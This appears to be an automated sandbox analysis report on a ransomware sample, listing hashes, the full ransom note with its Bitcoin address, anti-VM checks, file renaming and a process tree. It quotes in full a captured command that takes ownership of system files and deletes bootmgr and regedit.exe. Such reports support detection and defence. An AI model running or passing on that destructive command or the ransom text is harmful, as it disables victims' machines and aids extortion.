369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412

General

Target

369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
Size

3.1MB
MD5

6a85d0ba4d1db63d390b7a071d60e0ef
SHA1

79a32ee067e19b43bc3f29fde3a3ff95986f8e2e
SHA256

369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
SHA512

16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce

Score

10^/10

discovery evasion exploit ransomware spyware stealer themida trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\HOW-TO-DECRYPT.TXT

Ransom Note

Ooops! All your important files are encrypted! [+] What happend to my computer? [+] All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $250. [+] How do i pay? [+] Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom. [+] How can i contact? [+] 1.Download Tor browser (https://www.torproject.org/) 2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/) 3.Write email to us (CobraLocker@mail2tor.com) [+] What if i already paid? [+] Send your Bitcoin wallet ID to e-mail provided above. Attention! 1.Do not modify encrypted files. 2.Do not try decrypt your data using third party software. 3.Do not turn off your computer. Our bitcoin address: bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe

Emails

CobraLocker@mail2tor.com

URLs

http://mail2tor2zyjdctd.onion/

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
Disables Task Manager via registry modification
evasion

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\MeasureRestart.crw => C:\Users\Admin\Pictures\MeasureRestart.crw.DevilLock	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
File renamed	C:\Users\Admin\Pictures\RegisterDisable.crw => C:\Users\Admin\Pictures\RegisterDisable.crw.DevilLock	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
File renamed	C:\Users\Admin\Pictures\SplitPush.png => C:\Users\Admin\Pictures\SplitPush.png.DevilLock	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe

Possible privilege escalation attempt 5 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exetakeown.exe

pid process

1520 icacls.exe
844 takeown.exe
1804 icacls.exe
396 takeown.exe
2008 takeown.exe

pid	process
1520	icacls.exe
844	takeown.exe
1804	icacls.exe
396	takeown.exe
2008	takeown.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe

Modifies file permissions 1 TTPs 5 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exetakeown.exeicacls.exe

pid process

844 takeown.exe
1804 icacls.exe
396 takeown.exe
2008 takeown.exe
1520 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
844	takeown.exe
1804	icacls.exe
396	takeown.exe
2008	takeown.exe
1520	icacls.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/1192-57-0x0000000001130000-0x0000000001960000-memory.dmp	themida
behavioral1/memory/1192-58-0x0000000001130000-0x0000000001960000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe

pid process

1192 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1192	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	1192	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
Token: SeDebugPrivilege	1192	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
Token: SeTakeOwnershipPrivilege	2008	takeown.exe
Token: SeTakeOwnershipPrivilege	844	takeown.exe
Token: SeTakeOwnershipPrivilege	396	takeown.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.execmd.exe

description	pid	process	target process
PID 1192 wrote to memory of 1524	1192	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe	cmd.exe
PID 1192 wrote to memory of 1524	1192	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe	cmd.exe
PID 1192 wrote to memory of 1524	1192	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe	cmd.exe
PID 1192 wrote to memory of 1524	1192	369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe	cmd.exe
PID 1524 wrote to memory of 2008	1524	cmd.exe	takeown.exe
PID 1524 wrote to memory of 2008	1524	cmd.exe	takeown.exe
PID 1524 wrote to memory of 2008	1524	cmd.exe	takeown.exe
PID 1524 wrote to memory of 2008	1524	cmd.exe	takeown.exe
PID 1524 wrote to memory of 1520	1524	cmd.exe	icacls.exe
PID 1524 wrote to memory of 1520	1524	cmd.exe	icacls.exe
PID 1524 wrote to memory of 1520	1524	cmd.exe	icacls.exe
PID 1524 wrote to memory of 1520	1524	cmd.exe	icacls.exe
PID 1524 wrote to memory of 844	1524	cmd.exe	takeown.exe
PID 1524 wrote to memory of 844	1524	cmd.exe	takeown.exe
PID 1524 wrote to memory of 844	1524	cmd.exe	takeown.exe
PID 1524 wrote to memory of 844	1524	cmd.exe	takeown.exe
PID 1524 wrote to memory of 1804	1524	cmd.exe	icacls.exe
PID 1524 wrote to memory of 1804	1524	cmd.exe	icacls.exe
PID 1524 wrote to memory of 1804	1524	cmd.exe	icacls.exe
PID 1524 wrote to memory of 1804	1524	cmd.exe	icacls.exe
PID 1524 wrote to memory of 396	1524	cmd.exe	takeown.exe
PID 1524 wrote to memory of 396	1524	cmd.exe	takeown.exe
PID 1524 wrote to memory of 396	1524	cmd.exe	takeown.exe
PID 1524 wrote to memory of 396	1524	cmd.exe	takeown.exe

C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
"C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Modifies extensions of user files
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1520

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\drivers
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:844

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1804

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\LogonUI.exe
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:396

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

1

T1497

File Permissions Modification

1

T1222

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

2

T1012

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/396-67-0x0000000000000000-mapping.dmp

Download
memory/844-65-0x0000000000000000-mapping.dmp

Download
memory/1192-54-0x00000000765C1000-0x00000000765C3000-memory.dmp

Filesize
8KB

Download
memory/1192-57-0x0000000001130000-0x0000000001960000-memory.dmp

Filesize
8.2MB

Download
memory/1192-58-0x0000000001130000-0x0000000001960000-memory.dmp

Filesize
8.2MB

Download
memory/1192-59-0x0000000001130000-0x0000000001960000-memory.dmp

Filesize
8.2MB

Download
memory/1192-60-0x0000000077B80000-0x0000000077D00000-memory.dmp

Filesize
1.5MB

Download
memory/1192-61-0x0000000001130000-0x0000000001960000-memory.dmp

Filesize
8.2MB

Download
memory/1520-64-0x0000000000000000-mapping.dmp

Download
memory/1524-62-0x0000000000000000-mapping.dmp

Download
memory/1804-66-0x0000000000000000-mapping.dmp

Download
memory/2008-63-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads